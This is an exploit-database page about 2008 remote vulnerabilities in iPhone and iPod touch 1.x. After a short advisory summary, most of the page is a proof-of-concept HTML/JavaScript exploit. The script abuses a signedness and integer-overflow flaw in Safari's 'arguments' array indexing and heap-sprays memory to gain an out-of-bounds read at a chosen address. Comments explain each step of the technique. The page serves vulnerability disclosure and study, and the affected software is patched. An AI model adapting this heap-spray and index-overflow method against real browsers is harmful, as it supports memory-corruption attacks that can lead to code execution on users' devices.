header-logo
Suggest Exploit
vendor:
iPhone and iPod touch
by:
SecurityFocus
9.3
CVSS
HIGH
Spoofing, Information Disclosure, Buffer Overflow, Memory Corruption
119, 200, 787, 788
CWE
Product Name: iPhone and iPod touch
Affected Version From: iPhone 1.0
Affected Version To: iPhone 1.1.4 and iPod touch 1.1 through 1.1.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iOS
2008

Multiple Remote Vulnerabilities in Apple iPhone and iPod touch

Apple iPhone and iPod touch are prone to multiple remote vulnerabilities, which may allow users to spoof websites, disclose information, cause buffer overflows, and cause memory corruptions. Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible.

Mitigation:

Users should update to the latest version of iPhone and iPod touch.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30186/info

Apple iPhone and iPod touch are prone to multiple remote vulnerabilities:

1. A vulnerability that may allow users to spoof websites.
2. An information-disclosure vulnerability.
3. A buffer-overflow vulnerability.
4. Two memory-corruption vulnerabilities.

Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible.

These issues affect iPhone 1.0 through 1.1.4 and iPod touch 1.1 through 1.1.4. 

<BODY>
        <SCRIPT src="HeapSpray2.js"></SCRIPT>
        <CODE id="sploit status"></CODE>
        <CODE id="heapspray status"></CODE>
        <SCRIPT>
                // The index for the "arguments" array in a JavaScript function in
                // Safari suffers from a signedness issue that allows access to elements
                // that are out of bounds. The index is cast to a signed value before it
                // is compared to the length of the array to check if it within the
                // bounds. Integer values larger than 0x8000,0000 will be cast to a
                // negative value and because they are always smaller then the length,
                // they are treated as a valid index.
                // The index into the arguments array ends up in instructions
                // that multiply it by 4 to access data in an array of 32 bit values.
                // There are no checks for overflows in this calculation. This allows us
                // to cause it to access anything in memory:
                //     Pointer to object = base address + 4 * index
                // The base address varies only slightly and is normally about
                // 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
                // predictable location using heap spraying, we can then calculate an
                // index that will access this memory.
                var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
                var iTargetArea = 0x10000000;
                // Be advised that heap spraying is "upside down" in Safari: strings
                // are allocated at high addresses first and as the heap grows, the
                // addresses go down. The heap will therefor grow in between a lot of
                // DLLs which reside in this area of the address space as well.
                // We&#039;ll need to find an area of memory to spray that is not likely to
                // contain a DLL and easy to reach.
                var iTargetAddress = 0x55555555;
                //     iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
                // 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
                var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
                // iIndex = (iTargetAddress - iBase) / 4
                var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
                // We need to trigger the signedness issue so the index must be larger
                // then 0x8000,0000. Because of the integer overflow in the
                // multiplication, we can safely add 0x4000,0000 as often as we want;
                // the multiplication will remove it from the result.
                while (iIndex < 0x80000000) iIndex += 0x40000000
                document.getElementById("sploit status").innerHTML = (
                        "iBase + 4 * iIndex = " +
                        "0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
                        "0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
                );
                // Set up heap spray
                var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
                oHeapSpray.oOutputElement = document.getElementById("heapspray status")
                // Spray heap asynchronously and call sploit when done.
                oHeapSpray.spray(sploit)
                function sploit(oHeapSpray) {
                        // This will cause an access violation using the value 0xDEADBEEF,
                        // which comes from the strings we sprayed the heap with.
                        // 6aa3d57f 8b4f0c          mov     ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
                        arguments[iIndex];
                }
                function DWORD(iValue) {
                        return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
                }
        </SCRIPT>
</BODY>

Navigation

Suggest Exploit

Services By CQR